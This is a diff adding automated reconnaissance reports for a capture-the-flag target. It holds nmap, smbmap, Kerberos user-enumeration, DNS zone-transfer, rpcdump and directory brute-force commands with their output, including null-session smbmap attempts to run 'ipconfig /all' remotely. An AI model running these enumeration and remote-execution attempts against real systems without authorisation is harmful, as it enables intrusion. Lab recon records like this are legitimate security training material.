/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +3268/tcp filtered globalcatLDAP no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.69 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md new file mode 100644 index 00000000..99012d28 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md 
@@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 389 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +389/tcp filtered ldap no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.72 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md new file mode 100644 index 00000000..542cc3e4 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md 
@@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 445 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +445/tcp filtered microsoft-ds no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md new file mode 100644 index 00000000..99d3b8c1 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md 
@@ -0,0 +1,66 @@ +```bash +smbmap -H 10.129.243.131 -P 445 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 445 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... 
+ + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md new file mode 100644 index 00000000..cc01b66d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md 
@@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 464 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 1s + +PORT STATE SERVICE REASON VERSION +464/tcp filtered kpasswd5 no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.44 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md new file mode 100644 index 00000000..24bdd4c6 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md 
@@ -0,0 +1,18 @@ +```bash +dig -p 53 -x 10.129.243.131 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; no servers could be reached + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md new file mode 100644 index 00000000..2633b124 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md @@ -0,0 +1,19 @@ +```bash +dig AXFR -p 53 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; no servers could be reached + + + +``` 
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md
new file mode 100644
index 00000000..98ca9636
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md
@@ -0,0 +1,23 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml 10.129.243.131
+Nmap scan report for 10.129.243.131
+Host is up, received user-set.
+Scanned at 2023-10-28 13:49:47 CEST for 2s
+
+PORT STATE SERVICE REASON VERSION
+53/tcp filtered domain no-response
+
+Host script results:
+|_dns-brute: Can't guess domain of "10.129.243.131"; use dns-brute.domain script argument.
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.81 seconds
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md
new file mode 100644
index 00000000..e17fa24d
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md
@@ -0,0 +1,15 @@
+```bash
+impacket-rpcdump -port 593 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt):
+
+```
+Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
+
+[*] Retrieving endpoint list from 10.129.243.131
+[-] Protocol failed: Could not connect: timed out
+[*] No endpoints found.
+
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md
new file mode 100644
index 00000000..c34ad83e
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md
@@ -0,0 +1,3 @@
+```bash
+curl -sSikf http://10.129.243.131:80/robots.txt
+```
\ No newline at end of file
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md
new file mode 100644
index 00000000..6a1b93eb
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md
@@ -0,0 +1,60 @@ +```bash +curl -sSik http://10.129.243.131:80/ +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html): + +``` +HTTP/1.1 200 OK +Content-Type: text/html +Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +Accept-Ranges: bytes +ETag: "0eaf6d7c895d71:0" +Server: Microsoft-IIS/10.0 +Date: Sat, 28 Oct 2023 12:50:12 GMT +Content-Length: 1034 + + + + + + Slandovia Energy + + + + + + + +
+ + + + +
+ +

MegaCorp

+

+ Slandovia Energy Grid +

+ +
+ + + + + + +
    + no results +
+
+ + + + + + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md new file mode 100644 index 00000000..a1d10f40 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md @@ -0,0 +1,18 @@ +```bash +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt): + +``` +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md new file mode 100644 index 00000000..1aa59a75 --- /dev/null 
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md
@@ -0,0 +1,3 @@
+```bash
+curl -sSikf http://10.129.243.131:80/.well-known/security.txt
+```
\ No newline at end of file
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md
new file mode 100644
index 00000000..80a14cd3
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md
@@ -0,0 +1,20 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.243.131
+Nmap scan report for 10.129.243.131
+Host is up, received user-set.
+Scanned at 2023-10-28 13:49:48 CEST for 1s
+
+PORT STATE SERVICE REASON VERSION
+80/tcp filtered http no-response
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 4.02 seconds
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md
new file mode 100644
index 00000000..293f82bb
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md
@@ -0,0 +1,10 @@
+```bash
+whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt):
+
+```
+
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md
new file mode 100644
index 00000000..9615301b
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md
@@ -0,0 +1,3 @@
+```bash
+wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
+```
\ No newline at end of file
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md
new file mode 100644
index 00000000..24e4a3ff
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md
@@ -0,0 +1,20 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 88 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml 10.129.243.131
+Nmap scan report for 10.129.243.131
+Host is up, received user-set.
+Scanned at 2023-10-28 13:49:47 CEST for 1s
+
+PORT STATE SERVICE REASON VERSION
+88/tcp filtered kerberos-sec no-response
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md
new file mode 100644
index 00000000..3e43b008
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md
@@ -0,0 +1,22 @@
+```bash
+nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131
+```
+
+[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 123 "--script=banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml 10.129.243.131
+Nmap scan report for megacorp.htb (10.129.243.131)
+Host is up, received user-set (0.056s latency).
+Scanned at 2023-10-28 14:15:19 CEST for 10s
+
+PORT STATE SERVICE REASON VERSION
+123/udp open ntp udp-response ttl 127 NTP v3
+| ntp-info:
+|_ receive time stamp: 2023-10-28T12:15:20
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Oct 28 14:15:29 2023 -- 1 IP address (1 host up) scanned in 11.02 seconds
+
+```
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md
new file mode 100644
index 00000000..d1f597df
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md @@ -0,0 +1,29 @@ +```bash +dig -p 53 -x 10.129.243.131 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 16548 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 + +;; OPT PSEUDOSECTION: +; EDNS: version: 0, flags:; udp: 4000 +;; QUESTION SECTION: +;131.243.129.10.in-addr.arpa. IN PTR + +;; Query time: 4303 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:15:33 CEST 2023 +;; MSG SIZE rcvd: 56 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md new file mode 100644 index 00000000..e4993241 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md 
